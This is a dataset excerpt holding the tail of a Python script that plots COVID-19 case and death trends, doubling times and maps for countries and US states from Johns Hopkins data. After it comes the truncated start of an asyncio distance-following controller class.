df_country['Delta C'] > (xCmax+china_add)\n bool_deaths = df_country['Delta D'] > (xDmax+china_add)\n bool_china = df_country['Country/Region'] == 'China'\n\n df_country.loc[bool_cases & bool_china,'Delta C'] = xCmax+ china_add\n df_country.loc[bool_deaths & bool_china,'Delta D'] = xDmax+ china_add\n\n # find ratio and doubling # days\n df_country['ratio'] = dp.get_exponential_ratio( df_country['Date'], \n df_country['Confirmed'],\n df_country['Country/Region'], \n averaging_period ) \n df_country['doubling'] = pd.cut( df_country['ratio'], bin_array ,labels=range(len(bin_array)-1) , include_lowest=True )\n \n df_country['ratioD'] = dp.get_exponential_ratio( df_country['Date'], \n df_country['Death'],\n df_country['Country/Region'], \n averaging_period ) \n df_country['doublingD'] = pd.cut( df_country['ratioD'], bin_array ,labels=range(len(bin_array)-1) , include_lowest=True )\n\n \n \n df_country['Daily Confirmed'] = dp.find_daily_cases( df_country['Date'] , df_country['Confirmed'] )\n df_country['Daily Death'] = dp.find_daily_cases( df_country['Date'] , df_country['Death'] )\n \n\n df_country['Measure'] = dp.add_measures_column( 'measures_per_country.csv', \n df_country['Date'] ,\n df_country['Country/Region'])\n\n\n #--plotting map country----------------------------\n \n world = gpd.read_file(gpd.datasets.get_path('naturalearth_lowres')) \n\n countries_w = world['name'].tolist()\n countries_c = df_country['Country/Region'].unique().tolist()\n \n conversion_dict = {'United States': 'US',\n 'Taiwan': 'Taiwan*',\n 'Czech Rep.':'Czechia',\n 'Korea':'Korea, South',\n 'Dem. Rep. Korea': 'Korea, North',\n 'Dominican Rep.':'Dominican Republic' } \n \n world['name'] = world['name'].map(conversion_dict).fillna(world['name'])\n\n world['Cases'] = 1\n countries = world['name'].tolist()\n \n dates = df_country['Date'].unique() \n\n for country in countries: \n bool_country = df_country['Country/Region'] == country \n bool_date = df_country['Date'] == dates[-1]\n bool_prior = df_country['Date'] == dates[-7] \n \n if ((bool_country & bool_date).sum() > 0)&((bool_country&bool_prior).sum() > 0):\n now_cases = df_country.loc[bool_country&bool_date,'Confirmed'].values\n prior_cases = df_country.loc[bool_country & bool_prior,'Confirmed'].values\n latest_cases = (now_cases-prior_cases)/7\n \n if latest_cases < 1:\n latest_cases = 1\n else:\n latest_cases = 2\n \n bool_world = world['name'] == country \n world.loc[bool_world,'Cases'] = np.log(latest_cases) \n\n\n \n\n # state data import and process -------------------------------------------\n\n df_daily = dp.load_daily_reports( daily_path, daily_path_us )\n \n df_state = dp.process_daily_data( df_daily ) \n\n # adjust california funk \n bool_cal = df_state['State'] == 'California'\n bool_prior = df_state['Date'] < datetime.datetime(2020,2,10).date() \n df_state.loc[bool_cal & bool_prior,'Confirmed'] = 0 \n\n # --------------------------------------------------------------------------\n # df_state add missing dates, still to turn into function \n\n dates_unique = df_state['Date'].unique()\n dates = df_country['Date'].unique()\n # dates = df_state['Date'].unique()\n state_list = df_state['State'].unique() \n \n # find missing dates \n for state in state_list:\n # bool_state = df_state['State'] == state \n for date in dates:\n bool_state = df_state['State'] == state \n subframe = df_state.loc[bool_state,'Date'].tolist() \n if date not in subframe : \n append_series = pd.Series({'State':state,'Date':date,'Active':0,'Confirmed':0,'Deaths':0,'Recovered':0})\n df_state = df_state.append( append_series, ignore_index=True)\n \n # subframe\n bool_state = df_state['State'] == state\n df_state[bool_state].sort_values(by=['Date'])\n # --------------------------------------------------------------------------\n \n df_state['Delta C'] = dp.days_since_threshold( df_state['Date'],\n df_state['Confirmed'],\n df_state['State'] , \n threshold_cases) \n\n df_state['Delta D'] = dp.days_since_threshold( df_state['Date'],\n df_state['Deaths'],\n df_state['State'] , \n threshold_deaths_state)\n \n # # find ratio and doubling # days \n df_state['ratio'] = dp.get_exponential_ratio( df_state['Date'], \n df_state['Confirmed'],\n df_state['State'], \n averaging_period ) \n df_state['doubling'] = pd.cut( df_state['ratio'], bin_array ,labels=range(len(bin_array)-1) , include_lowest=True )\n\n\n\n df_state['ratioD'] = dp.get_exponential_ratio( df_state['Date'], \n df_state['Deaths'],\n df_state['State'], \n averaging_period ) \n df_state['doublingD'] = pd.cut( df_state['ratioD'], bin_array ,labels=range(len(bin_array)-1) , include_lowest=True )\n \n \n try_bool = df_state.groupby('State').max()['Delta C'] > 0 \n threshold_states = try_bool.index[try_bool].tolist()\n \n # something broken here, still to fix ------------------------------------------------\n\n df_state = df_state.sort_values( by=['State','Date']).reset_index(drop=True) \n\n\n df_state['Daily Confirmed'] = dp.find_daily_cases( df_state['Date'] , df_state['Confirmed'] )\n df_state['Daily Deaths'] = dp.find_daily_cases( df_state['Date'] , df_state['Deaths'] )\n \n df_state['Measure'] = dp.add_measures_column( 'measures_per_state.csv', \n df_state['Date'] ,\n df_state['State'])\n\n\n \n \n # ---------------------------------------------------------\n # --------------plotting country ------------------------ \n # ---------------------------------------------------------\n\n\n if plot_country:\n # -------------------log cases ---------------------------------------------------- \n try_bool = df_country.groupby('Country/Region').max()['Delta C'] > 0 \n threshold_countries = try_bool.index[try_bool].tolist()\n \n fig, ax = plt.subplots(1,1 ,figsize= full_w )\n\n\n for country in threshold_countries:\n bool_country = df_country['Country/Region'] == country \n df_pl = df_country[bool_country] \n doubling_category = df_pl['doubling'].iloc[0]\n pl1 = ax.plot( df_pl['Delta C' ], df_pl['Confirmed'],\n '.-' ,ms=3,lw=1.5, label=country,\n color = cols[doubling_category])\n \n if country in notable_countries: \n y = df_pl['Confirmed'].iloc[-1]*0.98\n x = df_pl['Delta C'].iloc[-1] + 0.5 \n t = ax.text(x,y,country, ha=\"left\", va=\"center\" , bbox=bbox_props)\n \n ax.set_yscale('log') \n ax.grid(True,which=\"major\", linestyle='-') \n ax.grid(True,which=\"minor\", linestyle=':', color=[.5,.5,.5],linewidth=0.6) \n\n xCmax = df_country.loc[bool_nochina,'Delta C'].max() \n yCmax = df_country['Confirmed'].max()\n \n ax.yaxis.set_ticks( tick_list )\n ax.yaxis.set_ticklabels( tick_label_list)\n\n ax.set_xlim([0,xCmax+10])\n ax.set_ylim([100,yCmax*2])\n\n ax.set_xlabel(\"Days since passing \"+ str(threshold_cases) + \" confirmed cases\") \n ax.set_ylabel(\"Confirmed cases\") \n\n ax.annotate('Last update: '+str( df_country['Date'].iloc[-1]), \n [.3,round(yCmax,5)*1.1], color=[.5,.5,.5], style='italic')\n\n xy = []\n sc = plt.scatter(xy, xy, c=xy, vmin=0, vmax=1, cmap=cmap)\n cax = fig.add_axes([0.65, 0.19, 0.2, 0.02])\n cb = plt.colorbar(sc, cax = cax, orientation='horizontal') \n\n cb.set_ticks(np.linspace(1/6,1,6)) \n cb.set_ticklabels( ['20','15','10','7','5']) \n cb.set_label('Doubling time in days (average over last 3)')\n cb.outline.set_visible(False)\n\n cb.ax.tick_params(which='major', length=15, width=1, direction='in',color='w')\n \n fig_name= 'covid_country_caseslog' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n # -------------------country deaths ---------------------------------------------------- \n fig, ax = plt.subplots(1,1 ,figsize= full_w )\n \n for country in threshold_countries:\n bool_country = df_country['Country/Region'] == country \n df_pl = df_country[bool_country] \n doubling_category = df_pl['doublingD'].iloc[0]\n pl1 = ax.plot( df_pl['Delta D' ], df_pl['Death'] ,\n '.-' ,ms=3,lw=1.5, label=country,\n color = cols[doubling_category])\n \n if country in notable_countries: \n y = df_pl['Death'].iloc[-1]*0.98\n x = df_pl['Delta D'].iloc[-1] + 0.5 \n t = ax.text(x,y,country, ha=\"left\", va=\"center\" , bbox=bbox_props)\n \n ax.set_yscale('log') \n ax.grid(True,which=\"major\", linestyle='-') \n ax.grid(True,which=\"minor\", linestyle=':', color=[.5,.5,.5],linewidth=0.6) \n\n ax.yaxis.set_ticks( tick_list )\n ax.yaxis.set_ticklabels( tick_label_list)\n\n xDmax = df_country.loc[bool_nochina,'Delta D'].max() \n yDmax = df_country['Death'].max()\n\n ax.set_xlim([0,xDmax+10])\n ax.set_ylim([25,yDmax*2]) \n \n ax.set_xlabel(\"Days since passing \" + str(threshold_deaths)+ \" deaths\") \n ax.set_ylabel(\"Deaths\") \n\n ax.annotate('Last update: '+str( df_country['Date'].iloc[-1]), \n [.3,round(yDmax,5)*1.1], color=[.5,.5,.5], style='italic')\n \n xy = []\n sc = plt.scatter(xy, xy, c=xy, vmin=0, vmax=1, cmap=cmap)\n cax = fig.add_axes([0.65, 0.19, 0.2, 0.02])\n cb = plt.colorbar(sc, cax = cax, orientation='horizontal') \n cb.set_ticks(np.linspace(1/6,1,6)) \n cb.set_ticklabels( ['20','15','10','7','5']) \n cb.set_label('Doubling time in days (average over last 3)')\n cb.outline.set_visible(False)\n\n cb.ax.tick_params(which='major', length=15, width=1, direction='in',color='w')\n\n fig_name= 'covid_country_deathslog' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n # ----------------plot grid of highlights-------------------------------------------------------\n \n # sort countries by confirmed cases on last date\n bool_last = df_country['Date'] == df_country['Date'].max()\n sorted_countries = df_country[bool_last].sort_values(by=['Confirmed'], ascending=False ) \n sorted_names = sorted_countries['Country/Region'].tolist() \n notable_countries = ['US','Japan','China','Italy' ,'Korea, South' ] \n\n dy = 3\n dx = 6\n fig, ax = plt.subplots( dy,dx ,figsize=full_w )\n \n for i, (ax_1, goal_country) in enumerate( zip(ax.reshape(-1), sorted_names[:(dy*dx)])): \n ax_1 = jp.plot_highlight(ax_1, goal_country, df_country['Delta C'],\n df_country['Confirmed'],\n df_country['Country/Region'],\n notable_countries,\n threshold_cases)\n ax_1 .grid(True ) \n \n if np.mod(i,dx) ==0:\n for country in threshold_countries:\n if (country in notable_countries) &( country not in goal_country):\n bool_country = df_country['Country/Region'] == country \n df_pl = df_country[bool_country] \n\n y = df_pl['Confirmed'].iloc[-1]*1.1\n x = df_pl['Delta C'].iloc[-1] + 1 \n ax_1.annotate( country ,[x,y], color=emph_col, fontsize = 8, ha='center')\n else: \n ax_1.axes.get_yaxis().set_ticklabels([])\n if i< (dy-1)*dx:\n ax_1.axes.get_xaxis().set_ticklabels([])\n \n xCmax = df_country['Delta C'].max() \n yCmax = df_country['Confirmed'].max()\n \n ax_1.set_xlim([0,xCmax+5])\n ax_1.set_ylim([100,yCmax*3])\n \n \n ax[0,0].set_ylabel('Cases') \n ax[0,0].annotate('Updated '+str( df_country['Date'].iloc[-1]), \n [6, 120], color=[.3,.3,.3], style='italic',fontsize=8)\n\n fig_name= 'covid_country_casesHighlightLog' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n # plot deaths highlight ------------------------------------------\n notable_countries = ['US','Japan','China','Italy' ,'Korea, South' ]\n dy = 3\n dx = 6\n fig, ax = plt.subplots( dy,dx ,figsize=full_w )\n \n for i, (ax_1, goal_country) in enumerate( zip(ax.reshape(-1), sorted_names[:(dy*dx)])): \n # ax_1 = plot_highlight(ax_1, goal_country, df_country) \n \n ax_1 = jp.plot_highlight(ax_1, goal_country, df_country['Delta D'],\n df_country['Death'],\n df_country['Country/Region'],\n notable_countries,\n threshold_deaths)\n \n ax_1 .grid(True ) \n \n if np.mod(i,dx) ==0:\n for country in threshold_countries:\n if (country in notable_countries) &( country not in goal_country):\n bool_country = df_country['Country/Region'] == country \n df_pl = df_country[bool_country] \n\n y = df_pl['Death'].iloc[-1]*1.1\n x = df_pl['Delta D'].iloc[-1] + 1 \n ax_1.annotate( country ,[x,y], color=emph_col, fontsize = 8, ha='center')\n else: \n ax_1.axes.get_yaxis().set_ticklabels([])\n if i< (dy-1)*dx:\n ax_1.axes.get_xaxis().set_ticklabels([])\n \n \n xDmax = df_country['Delta D'].max() \n yDmax = df_country['Death'].max()\n ax_1.set_xlim([0,xDmax+5])\n ax_1.set_ylim([25,yDmax*3])\n \n ax[0,0].set_ylabel('Deaths')\n\n ax[0,0].annotate('Updated '+str( df_country['Date'].iloc[-1]), \n [6, 28], color=[.3,.3,.3], style='italic',fontsize=8)\n\n fig_name= 'covid_country_deathsHighlightLog' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n\n\n\n #------------------map plot \n fig, ax = plt.subplots(1,1 ,figsize=half_w)\n\n wp = world.plot(column='Cases', ax=ax, cmap='OrRd' );\n\n wp.set_xbound(-161,161)\n wp.set_ybound(-57,85) \n\n vmin = world['Cases'].min() \n vmax = world['Cases'].max() \n sm = plt.cm.ScalarMappable(cmap='OrRd', norm=plt.Normalize(vmin=vmin, vmax=vmax))\n \n sm._A = []\n cax = fig.add_axes([0.2, 0.2, 0.6, 0.03])\n cb = fig.colorbar(sm, cax=cax, orientation='horizontal')\n \n\n tick_array = [1,10,100,1000,10000, 50000 ] \n log_cases = np.log( tick_array ) \n cb.set_ticks( log_cases ) \n cb.set_ticklabels( tick_array) \n cb.set_label(' Daily case increaes \\n (average over last 7 days)')\n \n ax.axis(\"off\")\n\n ax.annotate('Updated '+str( df_country['Date'].iloc[-1]), \n [-161,-57], color=[.3,.3,.3], style='italic',fontsize=8)\n fig_name= 'covid_map' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n\n #-----daily cases worldwide-----------------------------------------------------\n df_pl = df_country.groupby( 'Date').sum() \n df_pl['Date'] = df_pl.index \n\n fig, ax = plt.subplots(1 ,2,figsize=(full_w[0],4))\n\n ax[0] = jp.plot_daily( ax[0] , df_pl['Date'], df_pl['Daily Confirmed'] )\n ax[1] = jp.plot_daily( ax[1] , df_pl['Date'], df_pl['Daily Death'] )\n\n ax[0].set_title('Worldwide Daily Confirmed')\n ax[1].set_title('Worldwide Daily Deaths') \n ax[0].legend( )\n\n\n fig_name= 'covid_world_dailycases' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n #-----daily cases per country-----------------------------------------------------\n\n # sort countries by confirmed cases on last date\n bool_last = df_country['Date'] == df_country['Date'].max()\n sorted_countries = df_country[bool_last].sort_values(by=['Confirmed'], ascending=False ) \n sorted_countries.head(5) \n \n n_countries = 12\n top_countries = sorted_countries['Country/Region'][:n_countries].tolist()\n\n\n days = df_country['Date' ].unique() \n\n dates = df_pl['Date' ].unique() \n fig, ax = plt.subplots(n_countries ,2,figsize=( full_w[0],n_countries*3))\n \n for i,country in enumerate( top_countries ):\n df_pl = df_country[ df_country['Country/Region'] == country] \n \n bool_measure = df_pl['Measure'].notnull() \n measures= df_pl.loc[bool_measure,['Measure','Date']] \n \n jp.plot_daily( ax[i,0] , df_pl['Date'], df_pl['Daily Confirmed'], measures)\n jp.plot_daily( ax[i,1] , df_pl['Date'], df_pl['Daily Death'],measures)\n \n # add comparison lines \n ax[i,0].plot( dates[[0,len(days)-1]], [1000,1000],'--',color='k', alpha = 0.5 )\n ax[i,1].plot( dates[[0,len(days)-1]], [25,25],'--',color='k', alpha = 0.5 ) \n ax[i,0].set_ylabel( country )\n \n ax[0,0].set_title('Daily Confirmed')\n ax[0,1].set_title('Daily Deaths') \n\n # reverse the order \n ax[0,0].legend( ax[0,0].get_legend_handles_labels()[0][::-1] , \n ax[0,0].get_legend_handles_labels()[1] [::-1],\n bbox_to_anchor=(0.42, .7))\n\n\n ax[0,0].annotate('1000 cases',[dates[0],1000*1.5])\n ax[0,1].annotate('25 deaths',[dates[0],25*1.5])\n\n\n ax[0,0].annotate('Updated '+str( df_country['Date'].iloc[-1]), \n [dt.date2num( dates[0] ) ,df_country['Daily Confirmed'].max()*(0.94-0.12)], \n color=[.3,.3,.3], style='italic',fontsize=8)\n\n fig_name= 'covid_country_dailycases' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n\n\n\n\n # -----------state plots\n \n if plot_states: \n # # plot states log -----------------------------\n\n try_bool = df_state.groupby('State').max()['Delta C'] > 0\n threshold_states = try_bool.index[try_bool].tolist()\n\n notable_states = ['New York','New Jersey','Michigan',\"California\",\n 'Washington','Louisiana','Georgia','Utah' ]\n\n fig, ax = plt.subplots(1,1 ,figsize= full_w ) \n \n xCmax = df_state['Delta C'].max()\n yCmax = df_state['Confirmed'].max()\n\n for state in threshold_states:\n bool_state = df_state['State'] == state \n df_pl = df_state[bool_state] \n\n # print(state) \n # print(df_pl.tail() )\n\n doubling_category = df_pl['doubling'].iloc[0]\n\n pl1 = ax.plot( df_pl['Delta C' ], df_pl['Confirmed'],\n '.-' ,ms=3,lw=1.5, label=state,\n color = cols[doubling_category])\n \n y = df_pl['Confirmed'].iloc[-1]*0.98\n x = df_pl['Delta C'].iloc[-1] + 0.5 \n \n # print( x,y )\n\n if (state in notable_states) & (0 <= x <= xCmax+10) & (10<= y <= yCmax*2): \n t = ax.text(x,y,state, ha=\"left\", va=\"center\" , bbox=bbox_props)\n \n ax.set_yscale('log') \n ax.grid(True,which=\"major\", linestyle='-') \n ax.grid(True,which=\"minor\", linestyle=':', color=[.5,.5,.5],linewidth=0.6) \n \n ax.yaxis.set_ticks( tick_list )\n ax.yaxis.set_ticklabels( tick_label_list)\n\n ax.set_xlim([0,xCmax+5])\n ax.set_ylim([100,yCmax*2])\n\n ax.set_xlabel(\"Days since passing \"+ str(threshold_cases) + \" confirmed cases\") \n ax.set_ylabel(\"Confirmed cases\") \n\n ax.annotate('Last update: '+str( df_state['Date'].iloc[-1]), \n [.3,round(yCmax,5)*1.1], color=[.5,.5,.5], style='italic')\n\n # cmap = ListedColormap(cols)\n xy = []\n sc = plt.scatter(xy, xy, c=xy, vmin=0, vmax=1, cmap=cmap)\n cax = fig.add_axes([0.65, 0.19, 0.2, 0.02])\n cb = plt.colorbar(sc, cax = cax, orientation='horizontal') \n\n cb.set_ticks(np.linspace(1/6,1,6)) \n cb.set_ticklabels( bin_labels) \n cb.set_label('Doubling time in days (average over last 3)')\n cb.outline.set_visible(False)\n\n cb.ax.tick_params(which='major', length=15, width=1, direction='in',color='w')\n\n fig_name= 'covid_state_caseslog' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n\n # plot states deaths--------------------------------------------\n notable_states = ['New York','New Jersey','Michigan',\"California\",'Washington','Louisiana',\"Florida\",\"Oregon\"]\n\n fig, ax = plt.subplots(1,1 ,figsize= full_w ) \n \n xDmax = df_state['Delta D'].max()\n yDmax = df_state['Deaths'].max()\n\n for state in threshold_states:\n bool_state = df_state['State'] == state \n df_pl = df_state[bool_state] \n \n doubling_category = df_pl['doublingD'].iloc[0]\n pl1 = ax.plot( df_pl['Delta D' ], df_pl['Deaths'],\n '.-' ,ms=3,lw=1.5, label=state,\n color = cols[doubling_category])\n \n y = df_pl['Deaths'].iloc[-1]*0.98\n x = df_pl['Delta D'].iloc[-1] + 0.5 \n \n if (state in notable_states) & (0 <= x <= xCmax+10) & (10<= y <= yCmax*2): \n t = ax.text(x,y,state, ha=\"left\", va=\"center\" , bbox=bbox_props)\n \n ax.set_yscale('log') \n ax.grid(True,which=\"major\", linestyle='-') \n ax.grid(True,which=\"minor\", linestyle=':', color=[.5,.5,.5],linewidth=0.6) \n\n ax.yaxis.set_ticks( tick_list )\n ax.yaxis.set_ticklabels( tick_label_list)\n\n ax.set_xlim([0,xDmax+5])\n ax.set_ylim([10,yDmax*2])\n\n ax.set_xlabel(\"Days since passing \"+ str(threshold_deaths_state)+ \" confirmed cases\") \n ax.set_ylabel(\"Confirmed deaths\") \n\n ax.annotate('Last update: '+str( df_state['Date'].iloc[-1]), \n [.3,round(yDmax,5)*1.1], color=[.5,.5,.5], style='italic')\n \n xy = []\n sc = plt.scatter(xy, xy, c=xy, vmin=0, vmax=1, cmap=cmap)\n cax = fig.add_axes([0.65, 0.19, 0.2, 0.02])\n cb = plt.colorbar(sc, cax = cax, orientation='horizontal') \n\n cb.set_ticks(np.linspace(1/6,1,6)) \n cb.set_ticklabels(bin_labels) \n cb.set_label('Doubling time in days (average over last 3)')\n cb.outline.set_visible(False)\n\n cb.ax.tick_params(which='major', length=15, width=1, direction='in',color='w')\n\n fig_name= 'covid_state_deathslog' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n # ----------------plot grid of highlights-------------------------------------------------------\n # sort states by confirmed cases on last date\n bool_last = df_state['Date'] == df_state['Date'].max()\n sorted_states = df_state[bool_last].sort_values(by=['Confirmed'], ascending=False ) \n sorted_names = sorted_states['State'].tolist()\n\n notable_states = ['New York', 'Washington' ]\n\n dy = 3\n dx = 6\n\n fig, ax = plt.subplots( dy,dx ,figsize=full_w )\n \n for i, (ax_1, goal_states) in enumerate( zip(ax.reshape(-1), sorted_names[:(dy*dx)])): \n ax_1 = jp.plot_highlight(ax_1, goal_states, df_state['Delta C'],\n df_state['Confirmed'],\n df_state['State'],\n notable_states,\n threshold_cases)\n ax_1 .grid(True ) \n \n if np.mod(i,dx) ==0:\n for state in threshold_states:\n if (state in notable_states) &( state not in goal_states):\n bool_state = df_state['State'] == state\n df_pl = df_state[bool_state] \n\n y = df_pl['Confirmed'].iloc[-1]*1.1\n x = df_pl['Delta C'].iloc[-1] + 1 \n ax_1.annotate( state ,[x,y], color=emph_col, fontsize = 8, ha='center')\n else: \n ax_1.axes.get_yaxis().set_ticklabels([])\n if i< (dy-1)*dx:\n ax_1.axes.get_xaxis().set_ticklabels([])\n \n xCmax = df_state['Delta C'].max() \n yCmax = df_state['Confirmed'].max()\n \n ax_1.set_xlim([0,xCmax+5])\n ax_1.set_ylim([100,yCmax*3])\n \n ax[0,0].set_ylabel('Cases') \n ax[0,0].annotate('Updated '+str( df_state['Date'].iloc[-1]), \n [6, 120], color=[.3,.3,.3], style='italic',fontsize=8)\n\n fig_name= 'covid_state_casesHighlightLog' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n \n # ----------------plot grid of deaths highlights-------------------------------------------------------\n \n notable_states = ['New York' ,'Washington', 'California' ]\n \n dy = 3\n dx = 6\n\n fig, ax = plt.subplots( dy,dx ,figsize=full_w )\n \n for i, (ax_1, goal_states) in enumerate( zip(ax.reshape(-1), sorted_names[:(dy*dx)])): \n ax_1 = jp.plot_highlight(ax_1, goal_states, df_state['Delta D'],\n df_state['Deaths'],\n df_state['State'],\n notable_states,\n threshold_deaths)\n ax_1 .grid(True ) \n \n if np.mod(i,dx) ==0:\n for state in threshold_states:\n if (state in notable_states) &( state not in goal_states):\n bool_state = df_state['State'] == state\n df_pl = df_state[bool_state] \n\n y = df_pl['Deaths'].iloc[-1]*1.1\n x = df_pl['Delta D'].iloc[-1] + 1 \n ax_1.annotate( state ,[x,y], color=emph_col, fontsize = 8, ha='center')\n else: \n ax_1.axes.get_yaxis().set_ticklabels([])\n if i< (dy-1)*dx:\n ax_1.axes.get_xaxis().set_ticklabels([])\n \n xCmax = df_state['Delta D'].max() \n yCmax = df_state['Deaths'].max()\n \n ax_1.set_xlim([0,xCmax+5])\n ax_1.set_ylim([10,yCmax*3])\n \n \n ax[0,0].set_ylabel('Deaths') \n ax[0,0].annotate('Updated '+str( df_state['Date'].iloc[-1]), \n [6, 12 ], color=[.3,.3,.3], style='italic',fontsize=8)\n\n fig_name= 'covid_state_deathsHighlightLog' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n \n # # plot daily for US, by state data-----------------------------\n df_pl = df_state.groupby( 'Date').sum() \n df_pl['Date'] = df_pl.index \n\n fig, ax = plt.subplots(1 ,2,figsize=(full_w[0] ,4))\n\n ax[0] = jp.plot_daily( ax[0] , df_pl['Date'], df_pl['Daily Confirmed'] )\n ax[1] = jp.plot_daily( ax[1] , df_pl['Date'], df_pl['Daily Deaths'] )\n\n ax[0].set_title('US Daily Confirmed')\n ax[1].set_title('US Daily Deaths') \n ax[0].legend( ax[0].get_legend_handles_labels()[0][::-1] , ax[0].get_legend_handles_labels()[1] [::-1])\n\n \n # plot daily per state\n bool_last = df_state['Date'] == df_state['Date'].max()\n sorted_states = df_state[bool_last].sort_values(by=['Confirmed'], ascending=False ) \n sorted_states.head(5) \n\n n_state = 12\n top_state = sorted_states['State'][:n_state].tolist()\n\n dates = df_pl['Date' ].unique() \n fig, ax = plt.subplots(n_state ,2,figsize=( full_w[0] ,n_state*3))\n\n n_correction = 1\n\n for i,country in enumerate( top_state ):\n df_pl = df_state[ df_state['State'] == country]\n \n bool_measure = df_pl['Measure'].notnull() \n measures= df_pl.loc[bool_measure,['Measure','Date']] \n \n jp.plot_daily( ax[i,0] , df_pl['Date'], df_pl['Daily Confirmed'], measures)\n jp.plot_daily( ax[i,1] , df_pl['Date'], df_pl['Daily Deaths'],measures)\n \n # add comparison lines \n ax[i,0].plot( dates[[0,len(dates)-1]], [1000,1000],'--',color='k', alpha = 0.5 )\n ax[i,1].plot( dates[[0,len(dates)-1]], [25,25],'--',color='k', alpha = 0.5 ) \n ax[i,0].set_ylabel( country )\n \n ax[0,0].set_title('Daily Confirmed')\n ax[0,1].set_title('Daily Deaths') \n\n ax[0,0].legend( ax[0,0].get_legend_handles_labels()[0][::-1] , \n ax[0,0].get_legend_handles_labels()[1] [::-1],\n bbox_to_anchor=(0.42, .7))\n\n ax[0,0].annotate('1000 cases',[dates[0],1000*1.5])\n ax[0,1].annotate('25 deaths',[dates[0],25*1.5])\n \n ax[0,0].annotate('Updated '+str( dates[-1] ), \n [dates[0], df_state['Daily Confirmed'].max()*(0.94-0.1)], \n color=[.3,.3,.3], style='italic',fontsize=8)\n\n fig_name= 'covid_state_dailycases'\n if save_fig: \n jp.save_fig( figs_path, fig_name) \n \n # plot country map ------------------------------------------\n \n def move_scale_state( df, state_name, scaling_ratio, xy_movement): \n # get original polygons\n bool_state = df['STATE_NAME'] == state_name\n state_object = df.loc[bool_state,'geometry']\n state_geom = df.loc[bool_state,'geometry'].iloc[0] \n\n state_moved = shp.translate(state_geom, xy_movement[0], xy_movement[1]) \n centroid = state_moved.centroid\n state_scaled = shp.scale( state_moved, xfact=scaling_ratio, yfact=scaling_ratio, origin=centroid) \n state_object.iloc[0] = state_scaled\n df.loc[bool_state,'geometry'] = state_object\n \n return df\n data_path = os.path.join( base_path, 'geo_data\\states.shp' ) \n US = gpd.read_file(data_path) \n \n US = move_scale_state( US, 'Alaska', 0.4, [25,-31]) \n US = move_scale_state( US, 'Hawaii', 1.3, [35,6])\n\n US['average_increase']=0\n dates = df_state['Date'].sort_values().unique()\n\n for state in US['STATE_NAME'].unique(): \n \n in_state = df_state['State'] == state \n\n bool_date = df_state['Date'] == dates[-1]\n bool_prior = df_state['Date'] == dates[-7] \n \n if (np.sum(bool_date&in_state) > 0) & (np.sum(bool_prior&in_state) > 0):\n cases_date = df_state.loc[bool_date&in_state,'Confirmed'].values\n cases_prior = df_state.loc[bool_prior&in_state,'Confirmed'].values\n # print(cases_date, cases_prior) \n latest_cases = (cases_date-cases_prior)/7\n else:\n latest_cases = 2\n \n bool_US_state = US['STATE_NAME'] == state\n US.loc[bool_US_state,'average_increase'] = np.log(latest_cases)\n\n fig, ax = plt.subplots(1,1 ,figsize=half_w )\n\n wp = US.plot(column='average_increase', ax=ax, cmap='OrRd' );\n\n wp.set_xbound(-135,-66)\n wp.set_ybound(20,49.5) \n\n vmin = US['average_increase'].min()\n vmax = ( US['average_increase'].max() )\n \n sm = plt.cm.ScalarMappable(cmap='OrRd', norm=plt.Normalize(vmin=vmin, vmax=vmax)) \n \n sm._A = []\n cax = fig.add_axes([0.2, 0.25, 0.6, 0.03])\n cb = fig.colorbar(sm, cax=cax, orientation='horizontal')\n \n tick_array = [20,40,100,400,1000,4000,10000,20000,40000 ] \n log_cases = np.log( tick_array ) \n cb.set_ticks( log_cases ) \n cb.set_ticklabels( tick_array) \n cb.set_label(' Daily case increaes \\n (average over last 7 days)')\n\n ax.axis(\"off\")\n\n ax.annotate('Updated '+str( df_state['Date'].iloc[-1]), \n [-135,22 ], color=[.3,.3,.3], style='italic',fontsize=8)\n \n fig_name= 'covid_state_map' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n # show all figures ----------------------------------\n if show_plot:\n plt.show() ","sub_path":"JHU_main.py","file_name":"JHU_main.py","file_ext":"py","file_size_in_byte":38207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"616260419","text":"import asyncio\r\n\r\n\r\nclass StickyDistFollower(object):\r\n\r\n def __init__(self, event_callback, log=None):\r\n self.__event_callback = event_callback\r\n self.__log_data = {}\r\n self.__locked = False\r\n self.__moving = False\r\n self.__log = log\r\n\r\n @asyncio.coroutine\r\n def log(self):\r\n# print('store_logs: %s' % self.__log_data)\r\n data = ','.join(map(str, self.__log_data.get('dists', [0,0,0])))\r\n data += ',' + self.__log_data.get('action', '') + \"\\n\"\r\n if self.__log:\r\n yield from self.__log.write(data)\r\n\r\n @asyncio.coroutine\r\n def __stop_moving(self):\r\n if self.__moving:\r\n self.__event_callback(action='down', type='key_up')\r\n self.__moving = False\r\n self.__log_data['action'] = 'down_end'\r\n\r\n\r\n @asyncio.coroutine\r\n def process_distances(self, distances):\r\n self.__log_data = {'dists': distances}\r\n min_dist = min(distances)\r\n max_dist = max(distances)\r\n print(min_dist)\r\n if min_dist > 1.5 or max_dist < 0.1:\r\n yield from self.__stop_moving()\r\n elif min_dist < 0.2:\r\n yield from self.__start_relocating(distances)\r\n elif min_dist < 1.5:\r\n yield from self.__start_following(distances)\r\n# print(\"finish proc dists\")\r\n yield from self.log()\r\n\r\n @asyncio.coroutine\r\n def __start_relocating(self, dists):\r\n yield from self.__stop_moving()\r\n \r\n print(\"<><><><><><><><><><><><><><><>\")\r\n if dists[0] < dists[2] and dists[2] >= 0.1:\r\n yield from self.__turn_left()\r\n elif dists[0] >= dists[2] and dists[0] >= 0.1:\r\n yield from self.__turn_right()\r\n\r\n @asyncio.coroutine\r\n def __start_following(self, dists):\r\n if dists[2] <= dists[0] and dists[1] - dists[2] > 0.05:\r\n yield from self.__turn_right()\r\n elif dists[2] > dists[0] and dists[1] - dists[0] > 0.05:\r\n yield from self.__turn_left()\r\n else:\r\n yield from self.__move_forward()\r\n\r\n @asyncio.coroutine\r\n def 